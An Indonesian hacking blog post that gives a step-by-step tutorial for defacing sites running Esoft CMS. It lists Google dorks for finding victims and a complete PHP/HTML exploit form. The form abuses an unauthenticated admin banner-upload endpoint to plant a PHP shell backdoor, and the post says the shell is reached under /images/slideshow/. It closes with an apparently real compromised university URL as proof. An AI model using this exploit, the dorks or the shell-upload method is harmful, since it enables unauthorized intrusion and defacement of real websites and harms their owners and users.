Showing themes that are Seo, fast loading, light, fresh and professional.

 


Oke kembali lagi sama gw zildan Di blog Info Cyber Hacker.Kali ini gw akan ngasih tutorial deface esoft cms

Bahan bahan:

-Shell backdoor

-localhost/website

-Dork:

inurl:Esoft-cms intext:Log in or sign up

inurl:Esoft-cms intext:login

inurl:esoft-cms

Inurl:esoft_cms

-Script buat upshellnya

Oke langsung aja ke tutorialnya

Pertama tama kalian dorking dulu


Kalau sudah ada target yg menurut kalian vuln kalian buat file berektensi php

Di sini saya bikin zildan.php

Lalu kalian isi dengan code ini

<?php
if(isset($_POST['seve_photo'])){
$select="select * from slideshow order by id DESC limit 1";
$pquery=mysql_query($select) or die("cant connect in to data base");
if($id=mysql_fetch_array($pquery)){
        $id1=$id['id'];
}
$id1=$id1++;
$photo_name="slide_photo".$id1;
if(isset($_FILES['sl_photo_browse'])){
$file=$_FILES['sl_photo_browse'];
$upload_directory='images/slideshow/';
$ext_str = "jpg,jpeg,gif,png";
$allowed_extensions=explode(',',$ext_str);
$max_file_size = 10485760;//10 mb remember 1024bytes =1kbytes /* check allowed extensions here */
$ext = substr($file['name'], strrpos($file['name'], '.') + 1); //get file extension from last sub string from last . character
if (!in_array($ext, $allowed_extensions) ) {
echo "only".$ext_str." files allowed to upload"; // exit the script by warning
} /* check file size of the file if it exceeds the specified size warn user */
if($file['size']>=$max_file_size){
echo "only the file less than ".$max_file_size."mb  allowed to upload"; // exit the script by warning
}
$path=$photo_name.'.'.$ext;
if(move_uploaded_file($file['tmp_name'],$upload_directory.$path)){
$uploadfile=$path;
}
else{
echo "The file cant moved to target directory."; //file can't moved with unknown reasons likr cleaning of server temperory files cleaning
}
}
$slideshow_title=mysql_real_escape_string($_POST['sl_photo_caption']);
$sl_url = mysql_real_escape_string($_POST['sl_url']);
$position = mysql_real_escape_string($_POST['position']);
$page = mysql_real_escape_string($_POST['page']);
$insert="insert into slideshow(photo,slide_title,url,position,page) values ('$uploadfile','$slideshow_title','$sl_url','$position','$page')";
if(mysql_query($insert)){
echo '<script type="text/javascript">alert("Photo Insert Successfully");</script>';
}
else{
        echo '<script type="text/javascript">alert("error!");</script>';
}
}
?>
<style type="text/css">
<!--
.style1 {color: #FF0000}
-->
</style>
<form action="http://target.com/esoft_cms/administrator.php?admin_page=banner_slide.php&status=delete" method="post" enctype="multipart/form-data">
Exploiter Esoft-cms |  AUTO SHELL UPLOAD | exploit Founded And Author By Eagle_One. Update By Zildan
  <br />
  <table border="1" class="slideshow_select_option" width="500">
  <tr>
    <td><p>Select Photo</p></td>
    <td><input type="file" name="sl_photo_browse"/></td>
  </tr>
  <tr>
    <td>Slide Caption</td>
    <td><textarea name="sl_photo_caption"> </textarea></td>
  </tr>

   <tr>
    <td>Slide position(home Page)</td>
    <td> <select name="position"> <option value=""> Select Option </option>
                  <option value="1"> Left Side </option>
                  <option value="2"> Right Side </option>
         </select>
       </td>
  </tr>
<tr>
    <td>Slide position(Other Page)</td>
    <td>
       <select name="page"> <option value=""> Select Page Name </option>
           <?php
                     $sql="select * from content";
                         $rec=mysql_query($sql);
                         $S=0;
                         while($row=mysql_fetch_array($rec)){
                          $S++;
                         ?>     
                  <option value="<?php echo $row['id']; ?>"><?php  echo $row['content_title']; ?></option>
             <?php
                         }
                         ?>
         </select>
       </td>
  </tr>
   <tr>
  </tr>


  <tr>
    <td colspan="2"><input type="submit" name="seve_photo" class="log-twitter" value="Save Photo" /></td>
    </tr>
</table>
</form>
<?php if(isset($_GET['confirm']) && $_GET['confirm']=="yes"){
                $photoid=$_GET['id'];
$img=$_GET['img'];
$pdelete="delete from slideshow where id='$photoid'";
if(mysql_query($pdelete)){
        unlink("./images/slideshow/".$img);
        echo '<script type="text/javascript">alert("Photo Delete Successfully");location.href="?admin_page=banner_slide.php&status=delete"</script>';
}
}
?>
<form action="<?php $_SERVER['PHP_SELF'];?>" method="post" enctype="multipart/form-data">
<?php if(isset($_GET['status']) & $_GET['status']=="delete"){ ?>
<br />
<h3>Edit or Delete Photo</h3>
<br />
<table width="500" border="1" style="font-size:12px;">
  <tr>
    <td width="50"><strong>Si. No</strong></td>
    <td width="50"><strong>Preview</strong></td>
    <td><strong> Caption </strong></td>
     <td><strong> Page </strong></td>
      
        <td width="80"><strong>Action</strong></td>
  </tr>


  <?php $selectsli="select * from slideshow";
                $querysli=mysql_query($selectsli);
                $si_count=0;
                while($sliphoto=mysql_fetch_array($querysli)){
                $si_count++;
                ?>
                <tr>
        <td><?php echo $si_count; ?></td>
    <td><img src="./images/slideshow/<?php echo $sliphoto['photo']; ?>" width="50" height="50"/></td>
    <td><?php echo $sliphoto['slide_title']; ?></td>
    <td><?php echo $sliphoto['page']; ?></td>
      
        <td><a href="?admin_page=banner_slide.php&status=delete&confirm=yes&id=<?php echo $sliphoto['id'];?>&img=<?php echo $sliphoto['photo']; ?>" onclick="return confirm('Are you sure?');">Delete</a></td>
          </tr>
                <?php } ?>
</table>
<?php } ?>
</form>

Dibagian http://target.com/esoft_cms/administrator.php?admin_page=banner_slide.php&status=delete

Nah di bagian target.com/esoft_cms kalian ganti dengan target dan sesuai expoitnya

Kalau sudaj kalian buka localhost nya


Kalau succes kalian bakal di alihkan ke halaman login adminya

Cara manggil shellnya?

Cari aja di bagian ini

/images/slideshow/

/asset/images/slideshow/

Hasil?

http://afmc.edu.bd/z.php



Related Posts

There is no other posts in this category.
Seorang yang memiliki kepribadian yang menyendiri, tanpa mengenal dunia luar hanya melalui dunia online.
  • Facebook
  • WhatsApp
  • Instagram
  • Subscribe Our Newsletter

    Belum ada Komentar untuk "Tutorial Deface Esoft CMS live target .edu"

    Posting Komentar

    Iklan Atas Artikel

    Iklan Tengah Artikel 1

    Iklan Tengah Artikel 2

    Iklan Bawah Artikel